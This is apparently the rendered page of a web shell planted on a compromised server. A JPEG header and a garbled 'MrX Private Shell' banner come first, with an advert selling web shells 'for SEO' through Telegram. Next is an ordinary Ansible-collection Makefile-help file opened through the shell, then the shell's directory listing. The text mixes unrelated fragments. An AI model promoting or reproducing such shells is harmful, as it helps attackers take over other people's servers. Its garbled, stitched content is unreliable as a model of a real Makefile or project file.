����JFIF���������
__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
# ##@ Help Group Name
# .PHONY: recipe_name
# To pick up the recipe name, use:
# recipe_name: ## Recipe help.
# @echo -e $(_begin)
# ...works...
# @echo -e $(_finish)
# Use color in Makefiles.
_USE_COLOR ?= true
.DEFAULT_GOAL := help
# Color vars
_help_padding = 30
_black = \033[0;30m
_red = \033[0;31m
_green = \033[0;32m
_orange = \033[0;33m
_blue = \033[0;34m
_purple = \033[0;35m
_cyan = \033[0;36m
_lt_gray = \033[0;37m
_gray = \033[1;30m
_lt_rd = \033[1;31m
_lt_green = \033[1;32m
_yellow = \033[1;33m
_lt_blue = \033[1;34m
_lt_purple= \033[1;35m
_lt_cyan = \033[1;36m
_white = \033[1;37m
_reset = \033[0m
# Customize colors for 'make help'
_group = $(_lt_blue)
_recipe = $(_orange)
# Customize colors for make leaders/followers
_heading = $(_yellow)
# Use _make to execute make with consistent options
_make = make --no-print-directory
_watch = watch -n 1 --no-title
# Other vars
_LEADER = "================ ["
_FOLLOWER = "\] ================"
ifneq ($(_USE_COLOR),true)
# No color
_group =
_recipe =
_heading =
_reset =
endif
_begin = "$(_heading)$(_LEADER) Begin $@ $(_FOLLOWER)$(_reset)"
_finish = "$(_heading)$(_LEADER) Completed $@ $(_FOLLOWER)$(_reset)"
##@ General
.PHONY: help
help: ## Display this help.
@echo "$(_purpose)"
@awk 'BEGIN {FS = ":.*##"; printf "\nUsage:\n make $(_recipe)<recipe>$(_reset)\n"} /^[a-zA-Z_0-9-]+:.*?##/ { printf "$(_recipe)%-$(_help_padding)s$(_reset) %s\n", $$1, $$2 } /^##@/ { printf "\n$(_group)%s$(_reset)\n", substr($$0, 5) } ' $(MAKEFILE_LIST)
.PHONY: color-help
color-help: ## Edit Makefile-help to change color schemes.
@echo -e $(_begin)
@echo "To enable colors in make output, 'export _USE_COLOR=true' with the leading underscore"
@echo "Edit Makefile-help to change color schemes"
ifeq ($(_USE_COLOR),true)
@printf "\n\tColor is currently enabled\n\n"
else
@printf "\n\tColor is currently disabled\n\n"
endif
@echo -e $(_finish)
_find_ignore=.git|test|log
.PHONY: ansfind
ansfind: ## Search project files using: f='search term' make ansfind
@echo -e $(_begin)
find . -name "*" -type=f | xargs grep -n "$$f" | egrep -v '$(_find_ignore)'
@echo -e $(_finish)
| Name | Type | Size | Permission | Actions |
|---|---|---|---|---|
| ibox_vars | Folder | 0755 |
|
|
| meta | Folder | 0755 |
|
|
| playbooks | Folder | 0755 |
|
|
| plugins | Folder | 0755 |
|
|
| CHANGELOG.rst | File | 2.29 KB | 0644 |
|
| FILES.json | File | 10.66 KB | 0644 |
|
| MANIFEST.json | File | 1.13 KB | 0644 |
|
| Makefile | File | 13.1 KB | 0644 |
|
| Makefile-help | File | 2.16 KB | 0644 |
|
| requirements-dev.txt | File | 54 B | 0644 |
|
| requirements.txt | File | 647 B | 0644 |
|